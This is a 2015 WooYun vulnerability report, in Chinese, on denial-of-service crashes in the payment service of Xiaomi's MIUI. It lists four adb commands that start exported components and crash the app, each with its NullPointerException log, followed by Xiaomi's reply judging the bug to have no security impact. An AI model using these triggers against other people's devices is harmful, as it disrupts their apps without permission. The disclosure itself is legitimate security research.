漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-092591
漏洞标题:小米MIUI JLB50.0(稳定版)支付服务多处存在拒绝服务漏洞
相关厂商:小米科技
漏洞作者: elong
提交时间:2015-01-20 11:00
修复时间:2015-01-20 14:21
公开时间:2015-01-20 14:21
漏洞类型:拒绝服务
危害等级:低
自评Rank:3
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-20: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
MIUI JLB50.0(稳定版),支付服务(com.xiaomi.payment)所对外暴露的组件中,多处存在拒绝服务漏洞
详细说明:
以下四个操作,均可触发拒绝服务:
(1)adb shell am start -n com.xiaomi.payment/.ui.PaymentActivity
01-18 22:04:51.942: E/AndroidRuntime(23440): FATAL EXCEPTION: main
01-18 22:04:51.942: E/AndroidRuntime(23440): java.lang.NullPointerException
01-18 22:04:51.942: E/AndroidRuntime(23440): at org.json.JSONTokener.nextCleanInternal(JSONTokener.java:116)
01-18 22:04:51.942: E/AndroidRuntime(23440): at org.json.JSONTokener.nextValue(JSONTokener.java:94)
01-18 22:04:51.942: E/AndroidRuntime(23440): at org.json.JSONObject.<init>(JSONObject.java:154)
01-18 22:04:51.942: E/AndroidRuntime(23440): at org.json.JSONObject.<init>(JSONObject.java:171)
01-18 22:04:51.942: E/AndroidRuntime(23440): at com.xiaomi.payment.ui.CheckPaymentFragment.startCheckOrder(CheckPaymentFragment.java:71)
01-18 22:04:51.942: E/AndroidRuntime(23440): at com.xiaomi.payment.ui.CheckPaymentFragment.onActivityCreated(CheckPaymentFragment.java:66)
(2)adb shell am start -n com.xiaomi.payment/.ui.DiscountsActivity
01-18 22:07:20.080: E/AndroidRuntime(24170): FATAL EXCEPTION: Thread-21067
01-18 22:07:20.080: E/AndroidRuntime(24170): java.lang.NullPointerException
01-18 22:07:20.080: E/AndroidRuntime(24170): at com.xiaomi.payment.ui.DiscountsActivity.setLoginCookie(DiscountsActivity.java:266)
01-18 22:07:20.080: E/AndroidRuntime(24170): at com.xiaomi.payment.ui.DiscountsActivity.access$200(DiscountsActivity.java:38)
01-18 22:07:20.080: E/AndroidRuntime(24170): at com.xiaomi.payment.ui.DiscountsActivity$1.run(DiscountsActivity.java:87)
(3)adb shell am start -n com.xiaomi.payment/.ui.PosterActivity
01-18 22:08:34.830: E/AndroidRuntime(24529): Caused by: java.lang.NullPointerException
01-18 22:08:34.830: E/AndroidRuntime(24529): at com.xiaomi.payment.data.Session.<init>(Session.java:74)
01-18 22:08:34.830: E/AndroidRuntime(24529): at com.xiaomi.payment.data.Session.onRestoreInstanceState(Session.java:130)
01-18 22:08:34.830: E/AndroidRuntime(24529): at com.xiaomi.payment.base.BaseActivity.onCreate(BaseActivity.java:45)
01-18 22:08:34.830: E/AndroidRuntime(24529): at com.xiaomi.payment.ui.PosterActivity.onCreate(PosterActivity.java:46)
(4)adb shell am startservice -n com.xiaomi.payment/com.xiaomi.miui.pushads.sdk.MiPushRelayTraceService
01-18 22:10:26.229: E/AndroidRuntime(25075): Caused by: java.lang.NullPointerException
01-18 22:10:26.229: E/AndroidRuntime(25075): at com.xiaomi.miui.pushads.sdk.MiPushRelayTraceService.onStartCommand(MiPushRelayTraceService.java:49)
01-18 22:10:26.229: E/AndroidRuntime(25075): at android.app.ActivityThread.handleServiceArgs(ActivityThread.java:2523)
漏洞证明:
修复方案:
版权声明:转载请注明来源 elong@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-01-20 14:21
厂商回复:
此问题存在,但无安全影响。此类bug欢迎去miui论坛反馈,感谢提交。
最新状态:
暂无